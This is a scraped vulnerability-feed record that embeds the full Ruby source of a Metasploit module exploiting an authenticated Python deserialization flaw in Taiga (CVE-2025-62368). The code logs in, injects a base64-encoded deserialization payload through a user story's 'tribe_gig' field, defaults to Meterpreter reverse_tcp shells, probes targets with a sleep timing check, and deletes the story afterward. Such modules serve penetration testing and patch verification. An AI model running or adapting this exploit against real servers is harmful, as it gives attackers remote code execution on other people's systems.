{“lastseen”:”2026-01-07T19:04:51″,”description”:”This module exploits an unserialization flaw by creating a userstory in a project. Module Options msf use exploit\/multi\/http\/taigatribegigunserial msf exploittaigatribegigunserial show targets …targets… msf exploittaigatribegigunserial set TARGET…”,”published”:”2026-01-07T18:58:55″,”modified”:”2026-01-07T18:58:55″,”type”:”metasploit”,”title”:”Taiga tribe_gig authenticated unserialize remote code execution”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-HTTP-TAIGA_TRIBE_GIG_UNSERIAL-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-62368″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass TaigaClientException \\u003c StandardError; end\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::CmdStager\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Taiga tribe_gig authenticated unserialize remote code execution’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an unserialization flaw by\\n creating a userstory in a project.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘rootjog’, # Discovery\\n ‘whotwagner’ # Metasploit Module\\n ],\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/github.com\/taigaio\/taiga-back\/security\/advisories\/GHSA-cpcf-9276-fwc5’],\\n [‘CVE’, ‘2025-62368’]\\n ],\\n ‘Platform’ =\\u003e %w[linux unix python],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Python payload’,\\n {\\n ‘Arch’ =\\u003e [ ARCH_PYTHON ],\\n ‘Platform’ =\\u003e ‘python’,\\n ‘Type’ =\\u003e :python,\\n ‘DefaultOptions’ =\\u003e { ‘PAYLOAD’ =\\u003e ‘python\/meterpreter\/reverse_tcp’ }\\n }\\n ],\\n [\\n ‘Linux Command’, {\\n ‘Arch’ =\\u003e [ ARCH_CMD ],\\n ‘Platform’ =\\u003e %w[unix linux],\\n ‘Type’ =\\u003e :nix_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/linux\/http\/x64\/meterpreter_reverse_tcp’\\n }\\n }\\n ],\\n ],\\n ‘DefaultOptions’ =\\u003e {\\n ‘SSL’ =\\u003e false\\n },\\n ‘Privileged’ =\\u003e false,\\n ‘DisclosureDate’ =\\u003e ‘2025-10-28’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘TARGETURI’, [true, ‘Path to taiga’, ‘\/’]),\\n OptString.new(‘USERNAME’, [true, ‘The username to authenticate as’]),\\n OptString.new(‘PASSWORD’, [true, ‘The password to authenticate with’])\\n ]\\n )\\n end\\n\\n def authenticate(user, pass)\\n res = send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api\/v1\/auth’),\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e {\\n username: user,\\n password: pass,\\n type: ‘normal’\\n }.to_json,\\n ‘keep_cookies’ =\\u003e true\\n )\\n\\n raise TaigaClientException, ‘Login failed’ if res\\u0026.code != 200\\n\\n parsed_json = res.get_json_document\\n @token = parsed_json[‘auth_token’]\\n @taiga_user_id = parsed_json[‘id’]\\n end\\n\\n def get_project\\n res = send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api\/v1\/projects’),\\n ‘vars_get’ =\\u003e { ‘member’ =\\u003e @taiga_user_id, ‘order_by’ =\\u003e ‘user_order’ },\\n ‘method’ =\\u003e ‘GET’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘keep_cookies’ =\\u003e true\\n )\\n\\n raise TaigaClientException, ‘Get projects failed!’ if res\\u0026.code != 200\\n\\n projects = res.get_json_document\\n projects.each do |project|\\n @taiga_project = project[‘id’] if project[‘is_kanban_activated’]\\n end\\n\\n raise TaigaClientException, ‘No project with activated kanban found’ unless defined? @taiga_project\\n end\\n\\n def get_status\\n res = send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api\/v1\/userstories\/filters_data’),\\n ‘vars_get’ =\\u003e { ‘project’ =\\u003e @taiga_project },\\n ‘method’ =\\u003e ‘GET’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘keep_cookies’ =\\u003e true\\n )\\n\\n raise TaigaClientException, ‘Get status failed!’ if res\\u0026.code != 200\\n\\n status_data = res.get_json_document\\n raise TaigaClientException, ‘No statuses found!’ unless status_data.key? ‘statuses’\\n\\n status_data[‘statuses’].each do |stat|\\n return stat[‘id’] if stat[‘name’] == ‘New’\\n end\\n end\\n\\n def delete_userstory(id)\\n send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, \\”api\/v1\/userstories\/#{id}\\”),\\n ‘method’ =\\u003e ‘DELETE’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘headers’ =\\u003e { ‘Authorization’ =\\u003e \\”Bearer #{@token}\\” },\\n ‘keep_cookies’ =\\u003e true\\n )\\n end\\n\\n def send_payload(payload, project_status)\\n temp_project = Rex::Text.rand_text_alpha(10..15)\\n send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/api\/v1\/userstories’),\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘headers’ =\\u003e { ‘Authorization’ =\\u003e \\”Bearer #{@token}\\” },\\n ‘data’ =\\u003e {\\n _attrs: { project: @taiga_project, subject: ”, description: ”, tags: [], points: {}, swimlane: nil, status: project_status, is_archived: false }, _name: ‘userstories’, _dataTypes: {}, _modifiedAttrs: { subject: temp_project.to_s, description: temp_project.to_s }, _isModified: true, project: @taiga_project, subject: temp_project.to_s, description: temp_project.to_s, tags: [], points: {}, swimlane: nil, status: project_status, is_archived: false, is_closed: false,\\n tribe_gig: payload.to_s\\n }.to_json\\n )\\n end\\n\\n def check\\n cookie_jar.clear\\n begin\\n authenticate(datastore[‘USERNAME’], datastore[‘PASSWORD’])\\n get_project\\n project_status = get_status\\n rescue TaigaClientException =\\u003e e\\n return Exploit::CheckCode::Unknown(e)\\n end\\n sleep_time = rand(5..10)\\n pl = Msf::Util::PythonDeserialization.payload(:py3_exec, \\”import os;os.system(‘sleep #{sleep_time}’)\\”)\\n command = Rex::Text.encode_base64(pl)\\n res, elapsed_time = Rex::Stopwatch.elapsed_time do\\n send_payload(command, project_status)\\n end\\n return Exploit::CheckCode::Unknown(‘Could not connect to the web service’) unless res\\u0026.code == 201\\n\\n user_story_id = res.get_json_document[‘id’]\\n res = delete_userstory(user_story_id)\\n print_warning(‘Cleanup failed’) unless res\\u0026.code == 204\\n\\n print_status(\\”Elapsed time: #{elapsed_time} seconds.\\”)\\n return Exploit::CheckCode::Vulnerable(‘Detected vulnerable Taiga.io’) if sleep_time \\u003c= elapsed_time\\n\\n Exploit::CheckCode::Safe(‘Target is not vulnerable’)\\n end\\n\\n def execute_command(cmd, _opts = {})\\n # calls some method to inject cmd to the vulnerable code.\\n begin\\n project_status = get_status\\n rescue TaigaClientException =\\u003e e\\n fail_with(Failure::UnexpectedReply, e)\\n end\\n print_status(‘Sending payload..’)\\n res = send_payload(cmd, project_status)\\n print_good(‘Payload sent’)\\n user_story_id = res.get_json_document[‘id’]\\n print_status(‘Cleanup..’)\\n res = delete_userstory(user_story_id)\\n print_warning(‘Cleanup failed’) unless res\\u0026.code == 204\\n print_good(‘Userstory deleted’)\\n end\\n\\n def exploit\\n cookie_jar.clear\\n\\n begin\\n authenticate(datastore[‘USERNAME’], datastore[‘PASSWORD’])\\n get_project\\n rescue TaigaClientException =\\u003e e\\n fail_with(Failure::UnexpectedReply, e)\\n end\\n\\n if target[‘Type’] == :python\\n command = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, payload.encoded)\\n else\\n command = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, \\”import os;os.system(‘#{payload.encoded}’)\\”)\\n end\\n data = Rex::Text.encode_base64(command)\\n execute_command(data)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/taiga_tribe_gig_unserial.rb”,”cvss”:{“score”:9,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:R\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/taiga_tribe_gig_unserial\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-07T19:04:51″,”description”:”This module exploits an unserialization flaw by creating a userstory in a project. Module Options msf use exploit\/multi\/http\/taigatribegigunserial msf exploittaigatribegigunserial show targets …targets… msf exploittaigatribegigunserial…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,86,12,169,13,7,11,5],"class_list":["post-34497","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-90","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n